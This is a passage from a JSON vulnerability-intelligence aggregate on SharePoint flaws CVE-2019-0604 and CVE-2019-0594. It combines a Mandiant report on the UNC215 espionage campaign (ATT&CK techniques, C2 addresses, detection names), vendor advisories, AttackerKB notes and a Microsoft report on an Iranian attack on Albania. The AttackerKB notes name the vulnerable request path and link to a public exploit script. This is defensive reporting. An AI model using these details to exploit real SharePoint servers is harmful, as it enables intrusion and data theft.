with Iranian APT groups may have been intended to mislead analysts and suggest an attribution to Iran. Notably, in 2019 the government of Iran [accused](<https://twitter.com/azarijahromi/status/1206071513222467585>) APT27 of attacking its government networks and released a detection and removal tool for HYPERBRO malware.\n\n_Tradecraft Mistakes_\n\nWhile UNC215 prioritizes evading detection within a compromised network, Mandiant identified several examples of code, C2 infrastructure, and certificate reuse indicating that UNC215 operators are less concerned about defenders\u2019 ability to track and detect UNC215 activity.\n\n * In several instances, UNC215 used the same exact file against multiple victims and frequently shared infrastructure across victims. This lack of compartmentalization is not uncommon, but does show that UNC215 is relatively less concerned about the ability for their compromises to be linked to each other.\n * C2 servers used by UNC215 frequently reuse the same SSL certificate, as described in [Team Cymru\u2019s research](<https://vb2020.vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf>) in 2020.\n * On one network, between April 2019 and April 2020, an operator repeatedly and infrequently revisited a compromised network whenever an Endpoint Detection and Response (EDR) tool detected or quarantined tools like HYPERBRO and Mimikatz. After several months of repeated detections, UNC215 deployed an updated version of HYPERBRO and a tool called \u201canti.exe\u201d to stop Windows Update service and terminate EDR and Antivirus related services.\n\n#### Attribution\n\nMandiant attributes this campaign to Chinese espionage operators which we track as UNC215 a Chinese espionage operation that has been suspected of targeting organizations around the world since at least 2014. We have low confidence that UNC215 is associated with APT27. UNC215 has compromised organizations in the government, technology, telecommunications, defense, finance, entertainment, and health care sectors. The group targets data and organizations which are of great interest to Beijing's financial, diplomatic, and strategic objectives.\n\n#### Outlook and Implications\n\nThe activity detailed in this post demonstrates China\u2019s consistent strategic interest in the Middle East. This cyber espionage activity is happening against the backdrop of China\u2019s multi-billion-dollar investments related to the Belt and Road Initiative (BRI) and its interest in Israeli\u2019s robust technology sector.\n\n * Chinese companies have invested billions of dollars into Israeli technology startups, partnering or acquiring companies in strategic industries like semi-conductors and artificial intelligence.\n * As China\u2019s BRI moves westward, its most important construction projects in Israel are the railway between Eilat and Ashdod, a private port at Ashdod, and the port of Haifa.\n\nChina has conducted numerous intrusion campaigns along the BRI route to monitor potential obstructions\u2014political, economic, and security\u2014and we anticipate that UNC215 will continue targeting governments and organizations involved in these critical infrastructure projects in Israel and the broader Middle East in the near- and mid-term.\n\n#### MITRE ATT&amp;CK Techniques\n\n**ID**\n\n| \n\n**Technique** \n \n---|--- \n \nT1003.001\n\n| \n\nOS Credential Dumping: LSASS Memory \n \nT1007\n\n| \n\nSystem Service Discovery \n \nT1010\n\n| \n\nApplication Window Discovery \n \nT1012\n\n| \n\nQuery Registry \n \nT1016\n\n| \n\nSystem Network Configuration Discovery \n \nT1021.001\n\n| \n\nRemote Services: Remote Desktop Protocol \n \nT1027\n\n| \n\nObfuscated Files or Information \n \nT1033\n\n| \n\nSystem Owner/User Discovery \n \nT1055\n\n| \n\nProcess Injection \n \nT1055.003\n\n| \n\nProcess Injection: Thread Execution Hijacking \n \nT1055.012\n\n| \n\nProcess Injection: Process Hollowing \n \nT1056.001\n\n| \n\nInput Capture: Keylogging \n \nT1057\n\n| \n\nProcess Discovery \n \nT1059.001\n\n| \n\nCommand and Scripting Interpreter: PowerShell \n \nT1059.003\n\n| \n\nCommand and Scripting Interpreter: Windows Command Shell \n \nT1070.004\n\n| \n\nIndicator Removal on Host: File Deletion \n \nT1070.006\n\n| \n\nIndicator Removal on Host: Timestomp \n \nT1071.001\n\n| \n\nApplication Layer Protocol: Web Protocols \n \nT1078\n\n| \n\nValid Accounts \n \nT1082\n\n| \n\nSystem Information Discovery \n \nT1083\n\n| \n\nFile and Directory Discovery \n \nT1087\n\n| \n\nAccount Discovery \n \nT1090\n\n| \n\nProxy \n \nT1095\n\n| \n\nNon-Application Layer Protocol \n \nT1098\n\n| \n\nAccount Manipulation \n \nT1105\n\n| \n\nIngress Tool Transfer \n \nT1112\n\n| \n\nModify Registry \n \nT1113\n\n| \n\nScreen Capture \n \nT1115\n\n| \n\nClipboard Data \n \nT1133\n\n| \n\nExternal Remote Services \n \nT1134\n\n| \n\nAccess Token Manipulation \n \nT1140\n\n| \n\nDeobfuscate/Decode Files or Information \n \nT1190\n\n| \n\nExploit Public-Facing Application \n \nT1199\n\n| \n\nTrusted Relationship \n \nT1202\n\n| \n\nIndirect Command Execution \n \nT1213\n\n| \n\nData from Information Repositories \n \nT1482\n\n| \n\nDomain Trust Discovery \n \nT1489\n\n| \n\nService Stop \n \nT1497\n\n| \n\nVirtualization/Sandbox Evasion \n \nT1497.001\n\n| \n\nVirtualization/Sandbox Evasion: System Checks \n \nT1505.003\n\n| \n\nServer Software Component: Web Shell \n \nT1518\n\n| \n\nSoftware Discovery \n \nT1543.003\n\n| \n\nCreate or Modify System Process: Windows Service \n \nT1547.001\n\n| \n\nBoot or Logon Autostart Execution: Registry Run Keys / Startup Folder \n \nT1553.002\n\n| \n\nSubvert Trust Controls: Code Signing \n \nT1559.002\n\n| \n\nInter-Process Communication: Dynamic Data Exchange \n \nT1560\n\n| \n\nArchive Collected Data \n \nT1564.003\n\n| \n\nHide Artifacts: Hidden Window \n \nT1569.002\n\n| \n\nSystem Services: Service Execution \n \nT1573.002\n\n| \n\nEncrypted Channel: Asymmetric Cryptography \n \nT1574.002\n\n| \n\nHijack Execution Flow: DLL Side-Loading \n \nT1583.003\n\n| \n\nAcquire Infrastructure: Virtual Private Server \n \nT1588.003\n\n| \n\nObtain Capabilities: Code Signing Certificates \n \nT1608.003\n\n| \n\nStage Capabilities: Install Digital Certificate \n \n#### Indicators of Compromise\n\nThe following indicators have been seen in use with the noted malware families, but not all have been confirmed to be used by UNC215.\n\n**Type**\n\n| \n\n**Value**\n\n| \n\n**Description** \n \n---|---|--- \n \nIP\n\n| \n\n85.204.74.143\n\n| \n\nHYPERBRO C2 \n \nIP\n\n| \n\n103.79.78.48\n\n| \n\nHYPERBRO C2 \n \nIP\n\n| \n\n89.35.178.105\n\n| \n\nHYPERBRO C2 \n \nIP\n\n| \n\n47.75.49.32\n\n| \n\nHYPERBRO C2 \n \nIP\n\n| \n\n139.59.81.253\n\n| \n\nFOCUSFJORD C2 \n \nIP\n\n| \n\n34.65.151.250\n\n| \n\nFOCUSFJORD C2 \n \nIP\n\n| \n\n159.89.168.83\n\n| \n\nFOCUSFJORD C2 \n \nIP\n\n| \n\n103.59.144.183\n\n| \n\nFOCUSFJORD C2 \n \nIP\n\n| \n\n141.164.52.232\n\n| \n\nFOCUSFJORD C2 \n \n#### Detecting the Techniques\n\nFireEye detects this activity across our platforms.\n\n**Platform(s)**\n\n| \n\n**Detection Name** \n \n---|--- \n \n * Network Security\n * Email Security\n * Detection On Demand\n * Malware Analysis\n * File Protect\n| \n\n * Backdoor.Win32.HyperBro.FEC3\n * FE_APT_Backdoor_Win32_HYPERBRO_1\n * FE_Downloader_Win32_FOCUSFJORD_2\n * FE_Trojan_Raw32_SILKWRAP_1\n * Trojan.Win32.LuckyMouse.FEC3\n * FE_Trojan_Raw32_SILKWRAP_1\n * 33341691_APT.Downloader.Win.FOCUSFJORD\n * Trojan.Win32.DllHijack.FEC3\n * FE_Trojan_Raw32_SILKWRAP_1\n * FE_Autopatt_Win_FOCUSFJORD\n * Trojan.Generic\n * FE_Tool_Win_Generic_3\n * FE_Tool_Win32_Generic_3\n * FE_Trojan_Win_Generic_154\n * FE_Trojan_Win32_Generic_403\n * FE_Trojan_Win_Generic_155\n * FE_Trojan_Win64_Generic_54\n * FE_APT_Backdoor_Win32_HYPERBRO_2\n * FE_Trojan_Win32_Generic_404\n * FE_Trojan_Win32_Generic_406\n * Suspicious File Config\n * Suspicious Regkey Added\n * Suspicious Process Launch Activity\n * Suspicious Codeinjection Activity\n * Suspicious Process Delete Activity\n * Suspicious Process Hijacking Activity\n * Suspicious Process Self Deletion Activity \n \nEndpoint Security\n\n| \n\n * Generic.mg.a0b2193362152053\n * Generic.mg.26d079e3afb08af0\n * Generic.mg.28ce8dbdd2b7dfd1\n * Generic.mg.04c51909fc65304d\n * Generic.mg.0e061265c0b59980\n * Generic.mg.09ffc31a432f646e\n * Generic.mg.6ca8993b341bd90a\n * Generic.mg.0ec4d0a477ba21bd\n * Generic.mg.04dece2662f648f6\n * Trojan.GenericKD.43427954\n * Gen:Variant.Ursu.933105\n * Trojan.GenericKD.32762213\n * Trojan.GenericKD.34854595\n * Gen:Variant.Ursu.256631\n * Gen:Variant.Doina.16603\n * Gen:Variant.Doina.13437 \n \nHelix\n\n| \n\n * 1.1.2927.fireeye_intel_hit_ip\n * 1.1.2928.fireeye_intel_hit_ip\n * 1.1.2929.fireeye_intel_hit_ip\n * 1.1.2930.fireeye_intel_hit_ip\n * 1.1.2947.fireeye_intel_hit_hash\n * 1.1.2948.fireeye_intel_hit_hash\n * 1.1.2949.fireeye_intel_hit_hash\n * 1.1.2950.fireeye_intel_hit_hash\n * 1.1.1404.windows_methodology_unusual_web_server_child_process\n * 1.1.3506.windows_methodology_adfind\n * 1.1.1650.windows_methodology_mimikatz_args\n * 1.1.1651.antivirus_methodology_mimikatz\n * 1.1.1652.windows_methodology_invokemimikatz_powershell_artifacts\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-10T15:00:00", "type": "fireeye", "title": "UNC215: Spotlight on a Chinese Espionage Campaign in Israel", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604"], "modified": "2021-08-10T15:00:00", "id": "FIREEYE:338F0E4516B790140B04DBFA18EAAC20", "href": "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "symantec": [{"lastseen": "2021-06-08T19:04:52", "description": "### Description\n\nMicrosoft SharePoint Server is prone to a remote code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft SharePoint Enterprise Server 2016 \n * Microsoft SharePoint Foundation 2013 SP1 \n * Microsoft SharePoint Server 2010 SP2 \n * Microsoft SharePoint Server 2019 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2019-02-12T00:00:00", "type": "symantec", "title": "Microsoft SharePoint Server CVE-2019-0604 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-0604"], "modified": "2019-02-12T00:00:00", "id": "SMNTC-106914", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/106914", "cvss": {"score": 0.0, "vector": "NONE"}}], "prion": [{"lastseen": "2023-11-22T01:51:23", "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-0604.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-03-05T23:29:00", "type": "prion", "title": "Remote code execution", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0594", "CVE-2019-0604"], "modified": "2019-06-10T13:46:00", "id": "PRION:CVE-2019-0594", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2019-0594", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T01:51:24", "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-0594.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-03-05T23:29:00", "type": "prion", "title": "Remote code execution", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0594", "CVE-2019-0604"], "modified": "2019-12-13T15:17:00", "id": "PRION:CVE-2019-0604", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2019-0604", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-10-18T16:36:21", "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka \u2018Microsoft SharePoint Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2019-0604.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-03-05T00:00:00", "type": "attackerkb", "title": "CVE-2019-0594", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0594", "CVE-2019-0604"], "modified": "2023-10-06T00:00:00", "id": "AKB:0FA0C973-1E4C-48B7-BA36-DBE63803563D", "href": "https://attackerkb.com/topics/QjVBnwwgqW/cve-2019-0594", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:43:35", "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka \u2018Microsoft SharePoint Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2019-0594.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at March 20, 2020 1:46pm UTC reported:\n\nA .NET deserialization vulnerability exists within SharePoint that can be exploited remotely. The vulnerability was actively being exploited in the wild around the May 2019 time frame. Per the [ZDI Advisory](<https://www.zerodayinitiative.com/advisories/ZDI-19-181/>) the vulnerability is due to a lack of validation on user supplied data to an encoder class which can be leveraged to deserialize attacker-supplied data resulting in remote code execution.\n\nPer the Microsoft [advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>):\n\n> Exploitation of this vulnerability requires that a user uploads a specially crafted SharePoint application package to an affected version of SharePoint.\n\nA [public PoC](<https://github.com/k8gege/CVE-2019-0604/blob/master/cve-2019-0604-exp.py>) has been released.\n\nThe initial vulnerability is triggered via an HTTP POST request to `/_layouts/15/Picker.aspx?PickerDialogType=`.\n\n**ccondon-r7** at August 31, 2020 2:18pm UTC reported:\n\nA .NET deserialization vulnerability exists within SharePoint that can be exploited remotely. The vulnerability was actively being exploited in the wild around the May 2019 time frame. Per the [ZDI Advisory](<https://www.zerodayinitiative.com/advisories/ZDI-19-181/>) the vulnerability is due to a lack of validation on user supplied data to an encoder class which can be leveraged to deserialize attacker-supplied data resulting in remote code execution.\n\nPer the Microsoft [advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>):\n\n> Exploitation of this vulnerability requires that a user uploads a specially crafted SharePoint application package to an affected version of SharePoint.\n\nA [public PoC](<https://github.com/k8gege/CVE-2019-0604/blob/master/cve-2019-0604-exp.py>) has been released.\n\nThe initial vulnerability is triggered via an HTTP POST request to `/_layouts/15/Picker.aspx?PickerDialogType=`.\n\n**hrbrmstr** at May 12, 2020 7:48pm UTC reported:\n\nA .NET deserialization vulnerability exists within SharePoint that can be exploited remotely. The vulnerability was actively being exploited in the wild around the May 2019 time frame. Per the [ZDI Advisory](<https://www.zerodayinitiative.com/advisories/ZDI-19-181/>) the vulnerability is due to a lack of validation on user supplied data to an encoder class which can be leveraged to deserialize attacker-supplied data resulting in remote code execution.\n\nPer the Microsoft [advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>):\n\n> Exploitation of this vulnerability requires that a user uploads a specially crafted SharePoint application package to an affected version of SharePoint.\n\nA [public PoC](<https://github.com/k8gege/CVE-2019-0604/blob/master/cve-2019-0604-exp.py>) has been released.\n\nThe initial vulnerability is triggered via an HTTP POST request to `/_layouts/15/Picker.aspx?PickerDialogType=`.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-03-05T00:00:00", "type": "attackerkb", "title": "CVE-2019-0604", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0594", "CVE-2019-0604"], "modified": "2021-07-27T00:00:00", "id": "AKB:DF071775-CD3A-4643-9E29-3368BD93C00F", "href": "https://attackerkb.com/topics/JvMypun0L7/cve-2019-0604", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-12-07T14:44:49", "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-0604.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-03-05T23:29:00", "type": "cve", "title": "CVE-2019-0594", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0594", "CVE-2019-0604"], "modified": "2019-06-10T13:46:00", "cpe": ["cpe:/a:microsoft:sharepoint_server:2010", "cpe:/a:microsoft:sharepoint_foundation:2013", "cpe:/a:microsoft:sharepoint_enterprise_server:2016", "cpe:/a:microsoft:sharepoint_server:2019"], "id": "CVE-2019-0594", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-0594", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_foundation:2013:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_server:2010:sp2:*:*:*:*:*:*"]}, {"lastseen": "2023-12-07T14:44:56", "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-0594.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-03-05T23:29:00", "type": "cve", "title": "CVE-2019-0604", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0594", "CVE-2019-0604"], "modified": "2019-12-13T15:17:00", "cpe": ["cpe:/a:microsoft:sharepoint_server:2010", "cpe:/a:microsoft:sharepoint_foundation:2013", "cpe:/a:microsoft:sharepoint_enterprise_server:2016", "cpe:/a:microsoft:sharepoint_server:2019"], "id": "CVE-2019-0604", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-0604", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_foundation:2013:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_server:2010:sp2:*:*:*:*:*:*"]}], "mmpc": [{"lastseen": "2022-09-09T01:07:29", "description": "Shortly after the destructive cyberattacks against the Albanian government in mid-July, the Microsoft Detection and Response Team (DART) was engaged by the Albanian government to lead an investigation into the attacks. At the time of the attacks and our engagement by the Albanian government, Microsoft publicly stated that \u201cMicrosoft is committed to helping our customers be secure while achieving more. During this event, we quickly mobilized our Detection and Response Team (DART) to help the Albanian government rapidly recover from this cyber-attack. Microsoft will continue to partner with Albania to manage cybersecurity risks while continuing to enhance protections from malicious attackers.\u201d This blog showcases the investigation, Microsoft\u2019s process in attributing the related actors and the observed tactics and techniques observed by DART and the Microsoft Threat Intelligence Center (MSTIC) to help customers and the security ecosystem defend from similar attacks in the future.\n\nMicrosoft assessed with high confidence that on July 15, 2022, actors sponsored by the Iranian government conducted a destructive cyberattack against the Albanian government, disrupting government websites and public services. At the same time, and in addition to the destructive cyberattack, MSTIC assesses that a separate Iranian state-sponsored actor leaked sensitive information that had been exfiltrated months earlier. Various websites and social media outlets were used to leak this information.\n\nThere were multiple stages identified in this campaign:\n\n * Initial intrusion\n * Data exfiltration\n * Data encryption and destruction\n * Information operations\n\nMicrosoft assessed with high confidence that multiple Iranian actors participated in this attack\u2014with different actors responsible for distinct phases:\n\n * DEV-0842 deployed the ransomware and wiper malware\n * DEV-0861 gained initial access and exfiltrated data\n * DEV-0166 exfiltrated data\n * DEV-0133 probed victim infrastructure\n\nMicrosoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, the DEV reference is converted to a named actor:\n\nMicrosoft assessed with moderate confidence that the actors involved in gaining initial access and exfiltrating data in the attack are linked to EUROPIUM, which has been publicly linked to Iran\u2019s Ministry of Intelligence and Security (MOIS) and was detected using three unique clusters of activity. We track them separately based on unique sets of tools and/or TTPs; however, some of them may work for the same unit.\n\nInformation specific to Albania is shared with permission from the Albanian government.\n\nFigure 1. Threat actors behind the attack against the Albanian government\n\n## Forensic analysis\n\nEvidence gathered during the forensic response indicated that Iran-affiliated actors conducted the attack. This evidence includes, but is not limited to:\n\n * The attackers were observed operating out of Iran\n * The attackers responsible for the intrusion and exfiltration of data used tools previously used by other known Iranian attackers\n * The attackers responsible for the intrusion and exfiltration of data targeted other sectors and countries that are consistent with Iranian interests\n * The wiper code was previously used by a known Iranian actor\n * The ransomware was signed by the same digital certificate used to sign other tools used by Iranian actors\n\n### Intrusion and exfiltration\n\nA group that we assess is affiliated with the Iranian government, DEV-0861, likely gained access to the network of an Albanian government victim in May 2021 by exploiting the CVE-2019-0604 vulnerability on an unpatched SharePoint Server, administrata.al (Collab-Web2._*.*_), and fortified access by July 2021 using a misconfigured service account that was a member of the local administrative group. Analysis of Exchange logs suggests that DEV-0861 later exfiltrated mail from the victim\u2019s network between October 2021 and January 2022.\n\nDEV-0861 was observed operating from the following IPs to exfiltrate mail:\n\n * 144[.]76[.]6[.]34\n * 176[.]9[.]18[.]143\n * 148[.]251[.]232[.]252\n\nAnalysis of the signals from these IPs, and other sources, indicated that DEV-0861 has been actively exfiltrating mail from different organizations in the following countries since April 2020:\n\nFigure 2. Timeline of data exfiltration activities by DEV-0861\n\nThe geographic profile of these victims\u2014Israel, Jordan, Kuwait, Saudi Arabia, Turkey, and the UAE\u2014aligns with Iranian interests and have historically been targeted by Iranian state actors, particularly MOIS-linked actors.\n\nDEV-0166 was observed exfiltrating mail from the victim between November 2021 and May 2022. DEV-0166 likely used the tool 